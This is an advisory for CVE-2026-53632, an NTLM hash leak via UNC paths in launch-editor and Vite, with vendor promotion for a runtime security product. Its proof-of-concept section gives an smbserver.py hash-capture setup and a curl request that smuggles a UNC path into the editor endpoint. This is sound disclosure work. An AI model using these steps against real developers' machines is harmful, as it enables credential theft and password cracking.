CVE-2026-53632

CVE-2026-53632 is a medium-severity security vulnerability in launch-editor (npm), affecting versions <= 2.14.0. It is fixed in 2.14.1, 8.0.16, 7.3.5, 6.4.3, 0.1.24.

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path, the victim's NTLMv2 hash is transmitted to the attacker, who can then capture it and perform offline password cracking. Successful cracking reveals the victim's cleartext password.

An attacker could target a developer who runs a local development server that uses launch-editor: sending that developer a link is enough to obtain their NTLMv2 hash.

PoC

From the attacker's side, we will set up an SMB server. I personally used Impacket's smbserver.py, but something like Responder would work as well. To keep it simple, we will use smbserver.py here.

First, let's create a directory to serve as an SMB share.

mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt

Then, start the SMB server.

$ sudo smbserver.py -smb2support -debug share /tmp/data

Now, run any project that uses the launch-editor package. I have set up a simple "Hello world" project that uses Vite for this purpose. Then run the project locally (vite).

Finally, open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication, or use curl to achieve the same.

curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'

Note the IP address in the HTTP request and make sure it is the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.

Impact

If the following conditions are met, an attacker can obtain the NTLMv2 password hash of the user on the computer that is running launch-editor:

  • the computer is running Windows
  • NTLM is not disabled (disabling it is recommended, but it is still enabled by default)
  • the user visits the attacker's website, which sends a request to a middleware that uses launch-editor
  • the server hosting the middleware that uses launch-editor is running
  • the attacker knows the URL of that server and the middleware

This becomes a problem when the user's password is simple enough to be recovered by offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Affected versions

  • launch-editor (<= 2.14.0)
  • vite (>= 8.0.0, <= 8.0.15)
  • vite (>= 7.0.0, <= 7.3.4)
  • vite (<= 6.4.2)
  • vite-plus (<= 0.1.23)

Security releases

  • launch-editor → 2.14.1 (npm)
  • vite → 8.0.16 (npm)
  • vite → 7.3.5 (npm)
  • vite → 6.4.3 (npm)
  • vite-plus → 0.1.24 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade the following packages to resolve this vulnerability:

  • launch-editor to 2.14.1 or later
  • vite to 8.0.16 or later
  • vite to 7.3.5 or later
  • vite to 6.4.3 or later
  • vite-plus to 0.1.24 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-53632? CVE-2026-53632 is a medium-severity security vulnerability in launch-editor (npm), affecting versions <= 2.14.0. It is fixed in 2.14.1, 8.0.16, 7.3.5, 6.4.3, 0.1.24.
  2. Which packages are affected by CVE-2026-53632?
    • launch-editor (npm) (versions <= 2.14.0)
    • vite (npm) (versions >= 8.0.0, <= 8.0.15)
    • vite-plus (npm) (versions <= 0.1.23)
  3. Is there a fix for CVE-2026-53632? Yes. CVE-2026-53632 is fixed in 2.14.1, 8.0.16, 7.3.5, 6.4.3, 0.1.24. Upgrade to the fixed version for your package, or later.
  4. Is CVE-2026-53632 exploitable, and should I be worried? Whether CVE-2026-53632 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-53632 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-53632?
    • Upgrade launch-editor to 2.14.1 or later
    • Upgrade vite to 8.0.16 or later
    • Upgrade vite to 7.3.5 or later
    • Upgrade vite to 6.4.3 or later
    • Upgrade vite-plus to 0.1.24 or later
